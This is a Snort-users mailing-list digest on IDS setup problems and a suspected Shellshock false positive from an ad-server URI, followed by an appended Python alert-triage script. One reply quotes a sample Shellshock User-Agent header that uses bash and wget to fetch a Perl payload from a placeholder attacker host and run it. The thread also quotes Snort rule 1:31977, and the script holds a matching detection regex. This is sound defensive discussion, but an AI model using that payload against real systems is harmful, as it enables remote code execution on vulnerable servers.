[Snort-users] Snort-users Digest, Vol 106, Issue 16

Anthony Gallina anthonygallina1 at ...11827...
Fri Mar 6 01:15:05 EST 2015


Hello, I am a newbie to Snort. I am on an Ubuntu 14.04 system and trying to
get Snort, Barnyard2, Pulledpork and BASE to work. It looks like Snort is
outputting u2 files that look like binary code. Pulledpork is pulling new
rules. BASE is up but not showing any traffic. But it doesn't seem like
Barnyard2 is logging to my MySQL that is running local on Apache 2. Is it
possible to get assistance with this? Or should I just lurk for a while and
see if I can figure out what's going on? And sorry to mix my introduction
with a problem : (

On Thu, Mar 5, 2015 at 5:54 AM, <snort-users-request at lists.sourceforge.net>
wrote:

> Today's Topics:
>
>    1. Re: need assistance - no so rules with pulled pork
>       (Al Lewis (allewi))
>    2. Re: need assistance - no so rules with pulled pork
>       (Joel Esler (jesler))
>    3. Re: ShellShock Signatures (Colin Edwards)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Thu, 5 Mar 2015 12:12:46 +0000
> From: "Al Lewis (allewi)" <allewi at ...589...>
> Subject: Re: [Snort-users] need assistance - no so rules with pulled
>         pork
> To: Rata Pelua <intesnetmiosolo at ...11827...>,
>         "snort-users at lists.sourceforge.net"
>         <snort-users at lists.sourceforge.net>
> Message-ID:
>         <789F50FCB3014340B798E7CD25851FBE05D596DE at ...17064...>
> Content-Type: text/plain; charset="utf-8"
>
> For .so rules:
> http://vrt-blog.snort.org/2009/01/using-vrt-certified-shared-object-rules.html
>
> To run snort in IDS mode you need to add "-c" and point to a conf file so
> it can load the preprocessors:
>
> http://manual.snort.org/node6.html
>
>
>
> Hope this helps.
>
>
> Albert Lewis
> QA Software Engineer
> SOURCEfire, Inc. now part of Cisco
> 9780 Patuxent Woods Drive
> Columbia, MD 21046
> Phone: (office) 443.430.7112
> Email: allewi at ...589...
>
> From: Rata Pelua [mailto:intesnetmiosolo at ...11827...]
> Sent: Wednesday, March 04, 2015 6:49 AM
> To: snort-users at lists.sourceforge.net
> Subject: [Snort-users] need assistance - no so rules with pulled pork
>
>
> Hi Everybody,
>
>
> I'm having different issues when I have tried to configure pulledpork in
> my raspberry pi (Raspbian).
> Firstly, it didn't generate the snort.rules, but I tried several times,
> tried to check the pulledpork.conf,
> rename the path file, and after it, it successfully generated the
> snort.rules but not the .so rules ...
>
> Please, is there anybody who can help me?
>
> Also, I would like to activate the predecessor for port scan, I have tried
> to include a code in the snort.conf file (since 426-447) but when I ran
> snort -b
>
> I got a warning:
>
> WARNING: No preprocessors configured for policy 0.
>
>
>
> Attached there are my pulledpork.conf and snort.conf files, and output in
> -verbose mode.
>
> Thank you in advance,
> Atai
>
>
>
> ------------------------------
>
> Message: 2
> Date: Thu, 5 Mar 2015 12:25:58 +0000
> From: "Joel Esler (jesler)" <jesler at ...589...>
> Subject: Re: [Snort-users] need assistance - no so rules with pulled
>         pork
> To: Rata Pelua <intesnetmiosolo at ...11827...>
> Cc: "snort-users at lists.sourceforge.net"
>         <snort-users at lists.sourceforge.net>
> Message-ID: <221E9D49-6DFB-4067-A6E7-615FE8755CB6 at ...589...>
> Content-Type: text/plain; charset="us-ascii"
>
> What OS do you have on the pi?
>
> --
> Joel Esler
> Sent from my iPhone
>
> ------------------------------
>
> Message: 3
> Date: Thu, 5 Mar 2015 08:54:07 -0500
> From: Colin Edwards <colin.p.edwards at ...11827...>
> Subject: Re: [Snort-users] ShellShock Signatures
> To: "Joel Esler (jesler)" <jesler at ...589...>
> Cc: "snort-users at lists.sourceforge.net"
>         <snort-users at lists.sourceforge.net>
> Message-ID:
>         <CAJX8fKzA8b793o1v32euNP_7LA3=0br9nm1ydML6-YtMA4bymg at ...11828...>
> Content-Type: text/plain; charset="utf-8"
>
> The URI that is being alerted on is
> /ad/sacbee.jsp?loc=sbp_sbw_ros_ros_mediumbox&fmt=&fmtpos=
> &keyw=&jsfuncstart=(function()%20{%20var%20adagioAsyncParams={%22ap%22:
> true,%22ph%22:%22mainstage-free-html%22};&jsfunc=})();&
> jsfuncno=//})();&rlp=&rnd=267194691727
>
> That URI is in an HTTP GET request coming from the host inside our network,
> and that GET happens immediately after browsing to sacbee.com.  After a
> little more research, it looks like this is being caused by some Ad server
> running on their web server, and it's not trying to execute any shell
> commands.
>
> At the moment, we're using the base policy "Balanced Security and
> Connectivity", and have not made any modifications to it.  So, the rule for
> 1:31977 is:
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"OS-OTHER Bash
> CGI environment variable injection attempt"; flow:to_server,established;
> content:"() {"; fast_pattern:only; http_uri; metadata:policy balanced-ips
> drop, policy security-ips drop, ruleset community, service http;
> reference:cve,2014-6271; reference:cve,2014-6277; reference:cve,2014-6278;
> reference:cve,2014-7169; classtype:attempted-admin; sid:31977; rev:4; )
>
> It's pretty clear that "() {" is in the URI, so that makes sense why it
> triggered.  I'm a little unclear on $EXTERNAL_NET vs $HOME_NET right now,
> and why the rule is triggered on the outbound traffic (although it is good
> to know there's no malicious traffic originating from our network).  I need
> to look into that...maybe something we missed during initial configuration.
>
> The pcap of the packet that generated the alert is attached.
>
> Thanks,
> Colin
>
>
> On Tue, Mar 3, 2015 at 11:57 AM, Joel Esler (jesler) <jesler at ...589...>
> wrote:
>
> > We made a blog post back when this came out on the details of the
> > vulnerability here:
> > http://vrt-blog.snort.org/2014/09/shellshock-update-bash-immediately.html
> >
> > --
> > *Joel Esler*
> > Open Source Manager
> > Threat Intelligence Team Lead
> > Talos Group
> >
> > On Mar 3, 2015, at 11:37 AM, s0ups . <ynots0ups at ...11827...> wrote:
> >
> > On Mon, Mar 2, 2015 at 8:54 PM, Colin Edwards <colin.p.edwards at ...11827...> wrote:
> >
> >> Hello Snort Users,
> >>
> >> I'm a new list member, and happy to say that I've been working with
> >> Firesight and a couple of ASA-X Firepower modules for almost a week now.
> >> This is my first time hands-on w/ an IPS/IDS.  I'm here because I found
> >> this message from this list while researching an alert:
> >> http://sourceforge.net/p/snort/mailman/message/32980285/ .  I had a user
> >> viewing a newspaper's website today, and I received an alert for 1:31977.
> >> I actually wasn't familiar with the domain name, and just searching for the
> >> domain I saw in the alert in Google also generated an alert from my
> >> workstation (I assume something to do with Google pulling news/images to
> >> display in the results?).  The URI from the request does have "() {" in it,
> >> so that's why it was triggered, but I don't know if it's a False Positive
> >> alert.  The website was for the Sacramento Bee (www.sacbee.com).  I can
> >> provide more detail from the pcap / URI when I'm back in the office
> >> tomorrow.
> >>
> >> While I'm introducing myself as a snort newbie...If anyone has any
> >> recommendations for other resources or reading material, feel free to
> >> message me off-list.
> >>
> >> Cheers,
> >> Colin Edwards
> >> CISSP, GCIH, GCWN, GSEC, MCSE
> >>
> >>
> > Yo Colin,
> >
> > As you probably know, Shellshock attacks attempt to exploit environment
> > variables that use user-provided data. The attacks are pretty easy to
> > identify as they usually have some recognizable commands after the "() {
> > :;};". I've actually hardly, if ever, seen 1:31977 in my environment as the
> > majority of the legit hits I see target HTTP header fields (so 1:31978 is
> > more common) like so:
> >      GET /cgi-bin/possiblevulnerablescript.cgi
> >      User-Agent: () { :;}; /bin/bash -c "cd /var/tmp;wget
> > http://attackerwebsite/maliciousperlcode;perl maliciousperlcode
> >
> > Fireeye has a good explanation and illustration of the various attack
> > methods seen for the Shellshock vulnerability which will give you a good
> > idea on what the common attacks look like.
> > (https://www.fireeye.com/blog/threat-research/2014/09/shellshock-in-the-wild.html)
> >
> > Chances are if it's an HTTP response from an external webserver to a
> > client browser then it's a FP and poses little to no threat. I'd be
> > interested in checking out the URI if you want to send it to me.
> >
> > - s0ups
> >
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: packet.pcap
> Type: application/octet-stream
> Size: 1298 bytes
> Desc: not available
>
> ------------------------------
>
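The 1:31977 discussion in the digest above (the "() {" fast pattern, the percent-encoded ad URI that decodes to JavaScript, and the $EXTERNAL_NET/$HOME_NET question) can be worked through with a small triage script. This is an added example, not code from the thread, from Snort or from Talos; the names `FAST_PATTERN`, `SHELLSHOCK_RE`, `normalize_uri`, `triage` and `rule_direction_applies` are my own, `normalize_uri` only approximates http_inspect's normalization with percent-decoding, `UA_HEADER` is a constructed sample with a placeholder in place of a command, and the "HOME_NET any" case models a stock snort.conf default, not the poster's Firepower configuration.

```python
import ipaddress
import re
from urllib.parse import unquote

# Literal that rule 1:31977 matches (content:"() {"; http_uri). Snort's
# http_inspect percent-decodes the URI first, so "(function()%20{" hits.
FAST_PATTERN = "() {"

# Shape of a Shellshock (CVE-2014-6271 family) payload: an empty or ":;"
# function body followed by a command, e.g. "() { :;}; <cmd>". JavaScript
# function source carries a real body, so it does not fit this regex.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*(?::\s*;?\s*)?\}\s*;\s*(\S.*)")

# Samples: the ad URI quoted in the thread, plus a constructed header that
# only has a placeholder where a real payload would carry a command.
AD_URI = ("/ad/sacbee.jsp?loc=sbp_sbw_ros_ros_mediumbox&fmt=&fmtpos=&keyw="
          "&jsfuncstart=(function()%20{%20var%20adagioAsyncParams={%22ap%22:"
          "true,%22ph%22:%22mainstage-free-html%22};&jsfunc=})();&jsfuncno=//})();")
UA_HEADER = '() { :;}; /bin/bash -c "<command placeholder>"'

def normalize_uri(raw: str) -> str:
    """Approximate the http_inspect normalization the rule sees: %xx decoding."""
    return unquote(raw)

def triage(field_value: str) -> str:
    """Classify a URI or header value the way an analyst would after a hit."""
    decoded = normalize_uri(field_value)
    if FAST_PATTERN not in decoded:
        return "no-hit"
    m = SHELLSHOCK_RE.search(decoded)
    if m:
        return "shellshock-like: " + m.group(1)[:40]
    return "fast-pattern-hit-review"  # e.g. inline JavaScript in an ad URI

def rule_direction_applies(src_ip: str, dst_ip: str, home_net=None) -> bool:
    """Would the header '$EXTERNAL_NET any -> $HOME_NET' cover src -> dst?
    home_net=None models 'ipvar HOME_NET any' with EXTERNAL_NET also 'any',
    in which case every direction matches and an outbound GET to an ad server
    alerts too. A CIDR models HOME_NET set and EXTERNAL_NET = !$HOME_NET."""
    if home_net is None:
        return True
    home = ipaddress.ip_network(home_net)
    return (ipaddress.ip_address(dst_ip) in home
            and ipaddress.ip_address(src_ip) not in home)

if __name__ == "__main__":
    for sample in (AD_URI, UA_HEADER, "/index.html"):
        print(triage(sample))
```

The ad URI comes back as a fast-pattern hit that needs review rather than a Shellshock shape, which is the false positive Colin describes; with HOME_NET left as "any" the rule header also matches his outbound request.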

